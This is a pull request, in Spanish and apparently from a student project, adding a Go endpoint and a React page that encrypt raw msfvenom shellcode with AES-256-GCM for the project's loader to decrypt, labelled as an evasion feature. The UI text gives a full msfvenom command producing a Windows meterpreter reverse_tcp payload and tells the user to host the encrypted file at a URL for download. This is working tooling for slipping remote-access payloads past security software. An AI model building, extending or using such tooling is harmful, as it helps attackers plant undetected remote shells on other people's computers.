### PR TITLE
feat(evasion): agregar cifrado de shellcode AES-256-GCM desde la UI

### DIFF
--- a/Proyecto_grado/routes/payload_routes.go
+++ b/Proyecto_grado/routes/payload_routes.go
@@ -1,6 +1,11 @@
 package routes
 
 import (
+	"crypto/aes"
+	"crypto/cipher"
+	"crypto/rand"
+	"encoding/base64"
+	"io"
 	"net/http"
 	"path/filepath"
 	"proyecto_grado/builder"
@@ -14,6 +19,7 @@ import (
 func RegisterRoutes(r *gin.Engine) {
 	r.POST("/generar", generarPayloadHandler)
 	r.POST("/generar-evasion", generarEvasionHandler)
+	r.POST("/cifrar-shellcode", cifrarShellcodeHandler)
 }
 func RegisterScreenshotRoutes(r *gin.Engine) {
 	r.POST("/screenshot", controllers.ScreenshotHandler)
@@ -43,6 +49,64 @@ func generarPayloadHandler(c *gin.Context) {
 	c.Header("Content-Disposition", "attachment; filename="+filepath.Base(output))
 	c.Header("Content-Type", "application/octet-stream")
 	c.File(output)
+}
+
+func cifrarShellcodeHandler(c *gin.Context) {
+	file, err := c.FormFile("shellcode")
+	if err != nil {
+		c.JSON(http.StatusBadRequest, gin.H{"error": "No se recibió archivo shellcode"})
+		return
+	}
+
+	encKeyB64 := c.PostForm("encryption_key")
+	if encKeyB64 == "" {
+		c.JSON(http.StatusBadRequest, gin.H{"error": "Clave de cifrado requerida"})
+		return
+	}
+
+	key, err := base64.StdEncoding.DecodeString(encKeyB64)
+	if err != nil || len(key) != 32 {
+		c.JSON(http.StatusBadRequest, gin.H{"error": "Clave base64 inválida (debe ser AES-256, 32 bytes)"})
+		return
+	}
+
+	f, err := file.Open()
+	if err != nil {
+		c.JSON(http.StatusInternalServerError, gin.H{"error": "Error abriendo archivo"})
+		return
+	}
+	defer f.Close()
+
+	plaintext, err := io.ReadAll(f)
+	if err != nil {
+		c.JSON(http.StatusInternalServerError, gin.H{"error": "Error leyendo shellcode"})
+		return
+	}
+
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		c.JSON(http.StatusBadRequest, gin.H{"error": "Error creando cipher: " + err.Error()})
+		return
+	}
+
+	gcm, err := cipher.NewGCM(block)
+	if err != nil {
+		c.JSON(http.StatusInternalServerError, gin.H{"error": "Error creando GCM"})
+		return
+	}
+
+	nonce := make([]byte, gcm.NonceSize())
+	if _, err = io.ReadFull(rand.Reader, nonce); err != nil {
+		c.JSON(http.StatusInternalServerError, gin.H{"error": "Error generando nonce"})
+		return
+	}
+
+	// Formato: nonce || ciphertext (compatible con decrypt() del loader)
+	encrypted := gcm.Seal(nonce, nonce, plaintext, nil)
+
+	c.Header("Content-Disposition", "attachment; filename=shell_encrypted.bin")
+	c.Header("Content-Type", "application/octet-stream")
+	c.Data(http.StatusOK, "application/octet-stream", encrypted)
 }
 
 func generarEvasionHandler(c *gin.Context) {

--- a/front/front/src/pages/Evasion.jsx
+++ b/front/front/src/pages/Evasion.jsx
@@ -1,4 +1,4 @@
-import React, { useState } from "react";
+import React, { useState, useRef } from "react";
 import {
   Shield,
   Download,
@@ -15,6 +15,8 @@ import {
   Terminal,
   Eye,
   EyeOff,
+  Upload,
+  FileCode,
 } from "lucide-react";
 
 // ─── Paleta ───────────────────────────────────────────────────────────────────
@@ -133,6 +135,11 @@ export default function Evasion() {
   const [success, setSuccess] = useState(false);
   const [error, setError] = useState(null);
   const [showPreview, setShowPreview] = useState(false);
+  const [shellcodeFile, setShellcodeFile] = useState(null);
+  const [encrypting, setEncrypting] = useState(false);
+  const [encryptSuccess, setEncryptSuccess] = useState(false);
+  const [encryptError, setEncryptError] = useState(null);
+  const fileInputRef = useRef(null);
 
   const set = (field, value) => {
     setConfig((prev) => ({ ...prev, [field]: value }));
@@ -184,6 +191,44 @@ export default function Evasion() {
     }
   };
 
+  const handleEncryptShellcode = async () => {
+    if (!shellcodeFile) return;
+    if (!config.encryption_key.trim()) {
+      setEncryptError("Configurá primero la clave AES abajo");
+      return;
+    }
+    setEncrypting(true);
+    setEncryptSuccess(false);
+    setEncryptError(null);
+    try {
+      const formData = new FormData();
+      formData.append("shellcode", shellcodeFile);
+      formData.append("encryption_key", config.encryption_key);
+      const res = await fetch("http://localhost:5000/cifrar-shellcode", {
+        method: "POST",
+        body: formData,
+      });
+      if (!res.ok) {
+        const data = await res.json().catch(() => ({}));
+        throw new Error(data.error || `Error ${res.status}`);
+      }
+      const blob = await res.blob();
+      const url = window.URL.createObjectURL(blob);
+      const a = document.createElement("a");
+      a.href = url;
+      a.download = "shell_encrypted.bin";
+      document.body.appendChild(a);
+      a.click();
+      window.URL.revokeObjectURL(url);
+      document.body.removeChild(a);
+      setEncryptSuccess(true);
+    } catch (err) {
+      setEncryptError(err.message);
+    } finally {
+      setEncrypting(false);
+    }
+  };
+
   const previewJson = JSON.stringify(config, null, 2);
 
   return (
@@ -223,29 +268,97 @@ export default function Evasion() {
           {/* ── Panel izquierdo: configuración ── */}
           <div className="lg:col-span-2 space-y-5">
 
-            {/* Shellcode URL */}
+            {/* Cifrar Shellcode */}
             <div className="rounded-xl border p-5" style={{ background: CARD, borderColor: BORDER }}>
-              <SectionTitle icon={Link} label="Shellcode Remoto" color="#58a6ff" />
+              <SectionTitle icon={Upload} label="Cifrar Shellcode" color="#bc8cff" />
               <div className="space-y-4">
-                <InputField
-                  label="URL del shellcode cifrado"
-                  value={config.server_url}
-                  onChange={(v) => set("server_url", v)}
-                  placeholder="https://cdn.ejemplo.com/payload.bin"
-                />
                 <div
                   className="flex items-start gap-2 text-xs px-3 py-2 rounded-lg"
                   style={{ background: "rgba(88,166,255,0.08)", border: "1px solid rgba(88,166,255,0.2)", color: "#8b949e" }}
                 >
                   <Terminal size={12} className="mt-0.5 shrink-0" style={{ color: "#58a6ff" }} />
                   <span>
-                    Generá el shellcode con msfvenom y cifralo con la clave AES configurada abajo.
+                    Generá el shellcode raw con msfvenom, cifralo acá con la clave AES, y hosteá el <span className="font-mono" style={{ color: "#79c0ff" }}>shell_encrypted.bin</span> resultante.
                     Ejemplo: <span className="font-mono" style={{ color: "#79c0ff" }}>
                       msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=X LPORT=Y -f raw -o shell.bin
                     </span>
                   </span>
                 </div>
+
+                <div>
+                  <label className="block text-xs font-medium mb-1.5" style={{ color: "#8b949e" }}>
+                    Archivo shellcode (.bin raw de msfvenom)
+                  </label>
+                  <div className="flex gap-2">
+                    <input
+                      ref={fileInputRef}
+                      type="file"
+                      accept=".bin,.raw"
+                      className="hidden"
+                      onChange={(e) => {
+                        setShellcodeFile(e.target.files[0] || null);
+                        setEncryptSuccess(false);
+                        setEncryptError(null);
+                      }}
+                    />
+                    <button
+                      onClick={() => fileInputRef.current?.click()}
+                      className="flex items-center gap-2 px-3 py-2 rounded-lg text-xs font-mono transition-all"
+                      style={{
+                        background: "#0d1117",
+                        border: `1px solid ${shellcodeFile ? ACTIVE : BORDER}`,
+                        color: shellcodeFile ? "#79c0ff" : "#6e7681",
+                        flex: 1,
+                        textAlign: "left",
+                        minWidth: 0,
+                      }}
+                    >
+                      <FileCode size={12} style={{ color: shellcodeFile ? "#58a6ff" : "#484f58", flexShrink: 0 }} />
+                      <span className="truncate">
+                        {shellcodeFile ? shellcodeFile.name : "Seleccionar archivo..."}
+                      </span>
+                    </button>
+                    <button
+                      onClick={handleEncryptShellcode}
+                      disabled={!shellcodeFile || encrypting}
+                      className="flex items-center gap-1.5 px-3 py-2 rounded-lg text-xs font-semibold transition-all disabled:opacity-40 disabled:cursor-not-allowed whitespace-nowrap"
+                      style={{
+                        background: encryptSuccess ? "rgba(63,185,80,0.15)" : "rgba(188,140,255,0.15)",
+                        border: `1px solid ${encryptSuccess ? "rgba(63,185,80,0.4)" : "rgba(188,140,255,0.4)"}`,
+                        color: encryptSuccess ? "#3fb950" : "#bc8cff",
+                      }}
+                    >
+                      {encrypting ? (
+                        <Loader2 size={12} className="animate-spin" />
+                      ) : encryptSuccess ? (
+                        <CheckCircle size={12} />
+                      ) : (
+                        <Download size={12} />
+                      )}
+                      {encrypting ? "Cifrando..." : encryptSuccess ? "Descargado" : "Cifrar y Descargar"}
+                    </button>
+                  </div>
+                  {encryptError && (
+                    <p className="text-xs mt-1.5 font-mono" style={{ color: "#f85149" }}>{encryptError}</p>
+                  )}
+                  {encryptSuccess && (
+                    <p className="text-xs mt-1.5 font-mono" style={{ color: "#3fb950" }}>
+                      shell_encrypted.bin descargado — hostealo y copiá la URL abajo
+                    </p>
+                  )}
+                </div>
               </div>
+            </div>
+
+            {/* Shellcode URL */}
+            <div className="rounded-xl border p-5" style={{ background: CARD, borderColor: BORDER }}>
+              <SectionTitle icon={Link} label="URL del Shellcode Cifrado" color="#58a6ff" />
+              <InputField
+                label="URL donde hosteaste el shell_encrypted.bin"
+                value={config.server_url}
+                onChange={(v) => set("server_url", v)}
+                placeholder="https://cdn.ejemplo.com/shell_encrypted.bin"
+              />
             </div>
 
             {/* Cifrado */}

--- a/front/front/vite.config.js
+++ b/front/front/vite.config.js
@@ -12,6 +12,7 @@ export default defineConfig({
       '/api': 'http://localhost:5000',
       '/ws':  { target: 'ws://localhost:5000', ws: true },
       '/audit': 'http://localhost:5000',
+      '/cifrar-shellcode': 'http://localhost:5000',
     }
   }
 })


### PR DESCRIPTION
- Backend: endpoint POST /cifrar-shellcode que recibe el .bin raw de msfvenom y la clave AES, cifra con AES-256-GCM (nonce||ciphertext) compatible con el decrypt() del loader, y devuelve shell_encrypted.bin para descargar
- Frontend: card 'Cifrar Shellcode' en /evasion con selector de archivo y botón 'Cifrar y Descargar' que usa la clave AES configurada en la página
- vite.config.js: agregar proxy /cifrar-shellcode al backend